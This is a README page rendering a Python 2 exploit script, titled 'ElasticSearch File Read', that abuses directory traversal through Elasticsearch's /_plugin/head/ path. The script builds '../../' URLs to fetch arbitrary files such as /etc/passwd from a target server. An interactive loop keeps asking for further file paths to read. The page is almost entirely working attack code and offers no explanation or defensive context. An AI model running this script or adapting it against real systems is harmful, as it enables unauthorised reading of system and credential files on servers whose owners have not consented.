README.md
Rendering markdown...
import requests
import sys
banner='''
_____ _ _ _____ _____ _____ __ _____ _____ _____ _____ ______
/ __ \ | | | ___| / __ \| _ |/ | | ___| |____ ||____ ||____ ||___ /
| / \/ | | | |__ ______`' / /'| |/' |`| | |___ \ ______ / / / / / / / /
| | | | | | __|______| / / | /| | | | \ \______| \ \ \ \ \ \ / /
| \__/\ \_/ / |___ ./ /___\ |_/ /_| |_/\__/ / .___/ /.___/ /.___/ /./ /
\____/\___/\____/ \_____/ \___/ \___/\____/ \____/ \____/ \____/ \_/
ElasticSearch File Read
http://xx.xx.xx.xx:9200/_plugin/head/../../../../../../../../../etc/passwd
'''
print banner
def read_file(url,file):
if url[-1] == '/':
url = url[:-1]
vuln_url = url + "/_plugin/head/../../../../../../../../.." + file
else:
vuln_url = url + "/_plugin/head/../../../../../../../../.." + file
try:
result = requests.get(vuln_url)
if result.status_code == 200:
print result.content
except requests.ConnectionError,e:
print e
th = {"url":""}
while True:
if th.get("url") != "":
input_file = raw_input("\nfile >>: ")
if input_file == "exit":
exit()
elif input_file == 'set':
url = raw_input("set vuln url :")
th['url'] = url
elif input_file == 'show url':
print th.get("url")
else:
print
read_file(th.get("url"),input_file)
else:
print "\nExample : http://10.10.20.166:9200"
url = raw_input("\nSet URL >>: ")
th["url"] = url
if __name__ == '__main__':
read_file(sys.argv[1], sys.argv[2])